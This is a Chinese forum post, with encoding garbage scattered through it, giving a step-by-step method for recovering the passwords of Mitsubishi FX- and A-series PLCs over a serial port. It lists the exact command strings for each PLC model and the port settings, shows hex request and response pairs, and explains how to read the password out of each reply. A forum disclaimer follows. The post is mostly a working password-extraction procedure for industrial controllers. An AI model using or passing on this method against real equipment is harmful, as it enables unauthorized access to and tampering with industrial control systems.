1�����,使用串口調(diào)試器,設(shè)置好有關(guān)參數(shù)���。
2,確定三菱PLC型號,根據(jù)PLC型號選擇在串口調(diào)試器中輸入對應(yīng)字符串�����。
附:
PLC型號 對應(yīng)字符串
FX2 \STX0700808\ETX6A
FX2N \STX0300808\ETX66
FX2_EPROM \STX0800808\ETX6B
FXON/FXOX \STX0800808\ETX6B
FX1N/FX1X \STX0800808\ETX6B
3����、發(fā)送后在接收框中將顯示一串字符串����,如果你聰明的話一定會發(fā)現(xiàn)這些字符串的奧妙了���。
(就是返回的密碼)
如果看不出來的話��,將這些字符串拷貝到 HEX格式 中,發(fā)送一次看看。(發(fā)送前記得先斷開PLC)
建議你自己設(shè)置一個密碼��,然后用這個方法讀取一次看看��,以后就知道是怎么回事了。
密碼字符:0-9��,A-F。
4��,舉例說明破解A和FX系列PLC密碼:
A系列:
發(fā)送:A2 07 00 FF 02 05 AE 00 08 C3
接收:0B 00 FF 02 00 AA 77 55 BB EF CD AB A4 00
密碼:ABCDEF
發(fā)送:A2 07 00 FF 02 05 AE 00 08 C3
接收:0B 00 FF 02 00 AA 77 55 BB C1 B1 A1 A4
密碼:A1B1C1
分析:密碼為返回字符中BB至A4之間的字符,以每2字符為單位���,從右往左讀出�。
FX系列:
設(shè)置串口:COM1,波特率:9600�,數(shù)據(jù)位:7����,校驗:E偶����,停止位:1
輸入:EHX,顯示:ASC
發(fā)送:
02 30 38 30 30 38 30 38 03 36 42
返回一串16進(jìn)制的ASCII碼,30為數(shù)字0,31為數(shù)字1,01為A�,02為B,以此類推�;
例:02 30 38 30 30 38 30 38 03 36 42
\STX4236353433323130\ETX41
密碼是:B6543210 《42=B》
【必讀】版權(quán)免責(zé)聲明
1����、本主題所有言論和內(nèi)容純屬會員個人意見�����,與本論壇立場無關(guān)�。2�、本站對所發(fā)內(nèi)容真實性��、客觀性�����、可用性不做任何保證也不負(fù)任何責(zé)任����,網(wǎng)友之間僅出于學(xué)習(xí)目的進(jìn)行交流�。3�、對提供的數(shù)字內(nèi)容不擁有任何權(quán)利,其版權(quán)歸原著者擁有。請勿將該數(shù)字內(nèi)容進(jìn)行商業(yè)交易、轉(zhuǎn)載等行為��,該內(nèi)容只為學(xué)習(xí)所提供�,使用后發(fā)生的一切問題與本站無關(guān)����。 4���、本網(wǎng)站不保證本站提供的下載資源的準(zhǔn)確性��、安全性和完整性;同時本網(wǎng)站也不承擔(dān)用戶因使用這些下載資源對自己和他人造成任何形式的損失或傷害��。 5�����、本網(wǎng)站所有軟件和資料均為網(wǎng)友推薦收集整理而來���,僅供學(xué)習(xí)用途使用�����,請務(wù)必下載后兩小時內(nèi)刪除��,禁止商用���。6���、如有侵犯你版權(quán)的����,請及時聯(lián)系我們(電子郵箱1370723259@qq.com)指出��,本站將立即改正�。
|
